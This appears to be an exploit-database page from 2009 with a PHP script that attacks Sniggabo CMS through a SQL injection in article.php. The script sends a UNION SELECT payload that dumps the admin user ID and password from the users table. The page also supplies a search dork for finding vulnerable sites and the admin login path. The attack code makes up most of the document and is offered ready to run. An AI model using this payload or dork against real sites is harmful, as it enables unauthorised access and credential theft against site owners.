[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Sniggabo CMS (article.php id) Remote SQL Injection Exploit
# Published : 2009-06-11
# Author : Lidloses_Auge
# Previous Title : Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities
# Next Title : LightNEasy sql/no-db <= 2.2.x system Config Disclosure Exploit
<?php
print_r('
################################################
Sniggabo CMS - Remote SQL Injection Exploit
Date: 11.06.2009
Vulnerability discovered by: Lidloses_Auge
Exploit coded by: Lidloses_Auge
Homepage: http://www.novusec.com
Greetz to: -=Player=- , Suicide, enco,
Palme, GPM, karamble, Free-Hack
Admin Panel: [target]/admin/login.php
Dork: "powered by Sniggabo CMS" inurl:article.php?id
Use: php '.$argv[0].' http://www.site.com
################################################
');
$url = "$argv[1]/article.php?Id=null+union+select+concat(0x313a3a,userid,0x3a3a,password,0x3a3a)+from+users--";
$src = file_get_contents($url);
$data = split("::",$src);
echo "Admin: $data[1]nPassword: $data[2]n";
?>
# www.Syue.com [2009-06-11]